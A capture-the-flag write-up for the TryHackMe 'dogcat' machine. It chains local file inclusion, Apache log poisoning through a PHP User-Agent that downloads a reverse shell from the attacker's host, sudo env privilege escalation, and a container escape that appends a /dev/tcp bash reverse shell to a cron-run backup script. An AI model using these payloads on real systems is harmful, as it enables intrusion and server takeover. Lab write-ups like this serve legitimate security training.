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DogCat

These notes are from a challenge I did @tryhackme called dogcat.

First look

We know there is a website hosting dog and cat pictures. Let's have a look...

nmap

Running nmap to search for available services and versions: nmap -sC -sV 10.10.46.238

Host is up (0.021s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 24:31:19:2a:b1:97:1a:04:4e:2c:36:ac:84:0a:75:87 (RSA)
|   256 21:3d:46:18:93:aa:f9:e7:c9:b5:4c:0f:16:0b:71:e1 (ECDSA)
|_  256 c1:fb:7d:73:2b:57:4a:8b:dc:d7:6f:49:bb:3b:d0:20 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: dogcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Result: two ports open SSH on 22 and HTTP on 80

gobuster

Let's run gobuster to check for available folders using this command:

gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.46.238:80

Gobuster reveals the following three folders:

/cats                 (Status: 301) [Size: 311] [→ http://10.10.46.238/cats/]
/dogs                 (Status: 301) [Size: 311] [→ http://10.10.46.238/dogs/]
/server-status        (Status: 403) [Size: 277]

So basically we have a folder /dog with random dog pics and a folder /cat with random cat pics.

Opening /server-status we get the error so probably with a .htaccess file.

Forbidden

You don't have permission to access this resource.
Apache/2.4.38 (Debian)

nikto

Running nikto confirms the apache web server and shows PHP is used: nikto -h 10.10.46.238

nikto -h 10.10.46.238
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.46.238
+ Target Hostname:    10.10.46.238
+ Target Port:        80
+ Start Time:         2021-00-00 00:00:00 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ Retrieved x-powered-by header: PHP/7.4.3
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7890 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2021-00-00 00:00:00 (GMT-4) (326 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Visit website

So now we know machine 10.10.46.238 is running a Debian based Apache (2.4.38 ) web server with PHP (7.4.3) serving a website with dogs and cats (probably stored under "/dogs" and "/cats").

Let's visit the page on port 80 and click on dog or cat:

  • We can see a random dog or cat pic
  • See url changes to ?view=dog or ?view=cat.

Let's look at the "view?" parameter in more detail:

Changing the view parameter to "something" we get this error:

Sorry, only dogs or cats are allowed.

Changing the view parameter to "somethingwithdog" we get this error:

Warning: include(somethingwithdog.php): failed to open stream: No such file or directory in /var/www/html/index.php on line 24

Warning: include(): Failed opening 'somethingwithdog.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/html/index.php on line 24

So we know the page requires us to include dog (or cat) in the view-parameter of the request and then includes a file with whatever is in the view-parameter followed by ".php". But the file does not have to be in the same directory as the programmer had intended, maybe we can try to add a relative path to the file name.

We know the website is served using apache 2.4.38 (from opening /server-status and running nmap) so we could have a look at well known apache files e.g. the log files. Just to be safe, fell free to add as many ../ as you want :D

?view=./cat/../../../../../../../../var/log/apache2/access.log

This fails with the same error as above. So it seems we can only view ".php" files...

Log Poisoning

Based on how we can manipulate the view parameter, this page may be vulnerable to Local File Inclusion.

With 'php://filter/convert.base64-encode/resource=' we can convert the given resource to base64 With './cat/../index' we add they keyword cat and move back to the main web folder and choose index.php

?view=php://filter/convert.base64-encode/resource=./cat/../index

This results in the following string which is the base64 encoded representation of the index.php:

echo "PCFET0NUWVBFIEhUTUw+CjxodG1sPgoKPGhlYWQ+CiAgICA8dGl0bGU+ZG9nY2F0PC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgdHlwZT0idGV4dC9jc3MiIGhyZWY9Ii9zdHlsZS5jc3MiPgo8L2hlYWQ+Cgo8Ym9keT4KICAgIDxoMT5kb2djYXQ8L2gxPgogICAgPGk+YSBnYWxsZXJ5IG9mIHZhcmlvdXMgZG9ncyBvciBjYXRzPC9pPgoKICAgIDxkaXY+CiAgICAgICAgPGgyPldoYXQgd291bGQgeW91IGxpa2UgdG8gc2VlPzwvaDI+CiAgICAgICAgPGEgaHJlZj0iLz92aWV3PWRvZyI+PGJ1dHRvbiBpZD0iZG9nIj5BIGRvZzwvYnV0dG9uPjwvYT4gPGEgaHJlZj0iLz92aWV3PWNhdCI+PGJ1dHRvbiBpZD0iY2F0Ij5BIGNhdDwvYnV0dG9uPjwvYT48YnI+CiAgICAgICAgPD9waHAKICAgICAgICAgICAgZnVuY3Rpb24gY29udGFpbnNTdHIoJHN0ciwgJHN1YnN0cikgewogICAgICAgICAgICAgICAgcmV0dXJuIHN0cnBvcygkc3RyLCAkc3Vic3RyKSAhPT0gZmFsc2U7CiAgICAgICAgICAgIH0KCSAgICAkZXh0ID0gaXNzZXQoJF9HRVRbImV4dCJdKSA/ICRfR0VUWyJleHQiXSA6ICcucGhwJzsKICAgICAgICAgICAgaWYoaXNzZXQoJF9HRVRbJ3ZpZXcnXSkpIHsKICAgICAgICAgICAgICAgIGlmKGNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICdkb2cnKSB8fCBjb250YWluc1N0cigkX0dFVFsndmlldyddLCAnY2F0JykpIHsKICAgICAgICAgICAgICAgICAgICBlY2hvICdIZXJlIHlvdSBnbyEnOwogICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgJF9HRVRbJ3ZpZXcnXSAuICRleHQ7CiAgICAgICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgICAgIGVjaG8gJ1NvcnJ5LCBvbmx5IGRvZ3Mgb3IgY2F0cyBhcmUgYWxsb3dlZC4nOwogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9CiAgICAgICAgPz4KICAgIDwvZGl2Pgo8L2JvZHk+Cgo8L2h0bWw+Cg==" | base64 --decode

The index.php looks as follows:

<!DOCTYPE HTML>
<html>
<head>
    <title>dogcat</title>
    <link rel="stylesheet" type="text/css" href="/style.css">
</head>
<body>
    <h1>dogcat</h1>
    <i>a gallery of various dogs or cats</i>
    <div>
        <h2>What would you like to see?</h2>
        <a href="/?view=dog"><button id="dog">A dog</button></a> <a href="/?view=cat"><button id="cat">A cat</button></a><br>
        <?php
            function containsStr($str, $substr) {
                return strpos($str, $substr) !== false;
            }
            $ext = isset($_GET["ext"]) ? $_GET["ext"] : '.php';
            if(isset($_GET['view'])) {
                if(containsStr($_GET['view'], 'dog') || containsStr($_GET['view'], 'cat')) {
                    echo 'Here you go!';
                    include $_GET['view'] . $ext;
                } else {
                    echo 'Sorry, only dogs or cats are allowed.';
                }
            }
        ?>
    </div>
</body>
</html>

The interesting line here is$ext = isset($_GET["ext"]) ? $_GET["ext"] : '.php';. We see that if we add the parameter?ext we are no longer limited to requesting php files. We can add e.g.&ext=.txt or&ext=.log to view a text or log file or simply keep the parameter empty to view any file&ext=.

Now lets try looking at the apache2 access.log files again (this time with the "ext" parameter):

?view=./cat/../../../../../../../../var/log/apache2/access&ext=.log

Success! We can see the logs (our visits). The logs basically contain the URL request including parameters and the user-agent.

If you feel lucky, you could've guessed that there is a flag.php in the main folder of the website and try view this by misusing the view? parameter as follows:

?view=php://filter/convert.base64-encode/resource=./cat/../flag

We get the message: Here you go!PD9waHAKJGZsYWdfMSA9ICJUSE17VGgxc18xc19OMHRfNF9DYXRkb2d...

Which we can decode as follows to get the first flag:

echo "PD9waHAKJGZsYWdfMSA9ICJUSE17VGgxc18xc19OMHRfNF9DYXRkb2d=" | base64 --decode

However, this was a lucky guess... maybe there is another way to get there...

We can try to inject PHP code to the access.log and trigger the code by visiting the page. Remember from above, there are two things we can manipulate at request time that are written to the logs, the URL request including parameters and the user-agent. Let's try running a request e.g.:

?view=./cat/../../<?php echo "HI!";?>

Unfortunantly this fails as e.g. all spaces are URL encoded. However, there are clear spaces visible in the user-agent. Let's try to change the user-agent string:

curl -A "<?php echo "HI!";?>" http://10.10.46.238

Success! The user-agent string can be used to inject PHP code. Let's use this to download a php reverse shell.

Reverse shell

Kali comes with some reverse shells e.g. php-reverse-shell "/usr/share/webshells/php/php-reverse-shell.php".

Let's create a copy of this file and modify the two input fields marked with "// CHANGE THIS". The IP address to put here belongs to our kali machine.

$ip = '10.9.182.239';  // CHANGE THIS
$port = 9999;          // CHANGE THIS

Serve the file e.g. with python as follows:

python -m http.server 9090

And start netcat on port 9999 in a second shell:

nc -lvnp 9999

Now let's run a GET request with a custom user-agent that includes PHP to get the reverse-shell

curl -A "<?php file_put_contents('shell.php',file_get_contents('http://10.9.182.239:9090/shell.php')); ?>" http://10.10.46.238

Alternatively we could use any other tool to send a GET request with custom user-agent string. E.g. burp-suite or write a python script like so:

import requests
print (requests.get('http://10.10.46.238/?view=cat', headers={'User-Agent': '<?php file_put_contents("shell.php",file_get_contents("http://10.9.182.239:9090/shell.php")); ?>',}).text)

Use the previous technique to include the access log again:

?view=./cat/../../../../../../../../var/log/apache2/access&ext=.log

You should not see our injected agent string because the injected php code is interpreted and executed and has no output. But you can see if this worked by checking the status of the python HTTP server.

We can now start the shell.php located in the the main web folder:

?view=./cat/../shell

On the netcat terminal we should now have a command prompt :) Runningwhoami we see we are user "www-data". Searching for flag2 reveals the following file:

find / -type f -iname "flag*"
var/www/html/flag.php
var/www/flag2_QMW7JvaY2LvK.txt

Btw, it is possible to view flag2 within the browser and without reverse shell:

?view=./dog/../../../../../var/www/flag2_QMW7JvaY2LvK&ext=.txt

Privilege escalation

Now that we have a shell as user "www-data":

  • let's see what this user is allowed to do: sudo -l
  • We can exploit the env privilege with this command to gain root access: sudo /usr/bin/env sudo -i

Runningwhoami we can see that we are root. Now, let's again look for a flag:

find / -type f -iname "flag*"
/root/flag3.txt

Escape the container

The last challenge is to find flag 4 which is nowhere to be found on the current system. We need to search for interesting things on the system...

List IP addresses connected to your server on port 80: netstat -tn 2>/dev/null | grep :80 | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -nr | head

In the root folder we can find a ".dockerenv" file. The hostname looks like a default docker container name.

  • Let's see if proc/self/cgroup contains "docker" or "lxc": grep 'docker\|lxc' /proc/1/cgroup.
  • or run this script: echo IsContainer: ; if [[ -f /.dockerenv ]] || grep -Eq '(lxc|docker)' /proc/1/cgroup; then echo True; else echo False; fi

So we know we are running in a container. Let us look around and find other interesting files e.g.:

  • search for largest files: lsof / | awk '{ if($7 > 1048576) print $7/1048576 "MB" " " $9 " " $1 }' | sort -n -u | tail
  • or search for newest filesfind / -type d \( -name sys -o -name proc \) -prune -o -name "*" -mtime -0.02 -print

We find that "backup.tar" was last updated and it is updated every minute! It seems as if the backup is created using the shell script in the same folder.

This looks promising: We are root in a container that hosts the dogcat website and there is a script triggered from outside of the container running the "backup.sh" script (that we are able to edit) every minute.

Let's try to exploit the backup.sh with a bash reverse shell:

  • Start a new netcat session on your system: nc -lvnp 7777
  • Append the bash reverse shell to the backup script: echo "bash -i >& /dev/tcp/10.9.182.239/7777 0>&1" >> backup.sh

After waiting at most 59 seconds the backup job will trigger, run our modified script and we get another shell from the container host system.

Runningwhoami we can see that we are root - whoop whoop!

Let's search for flag 4:

find / -type f -iname "flag*"
container/flag4.txt